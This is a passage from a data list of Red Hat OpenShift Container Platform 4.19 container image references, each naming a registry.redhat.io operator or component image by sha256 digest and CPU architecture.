"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
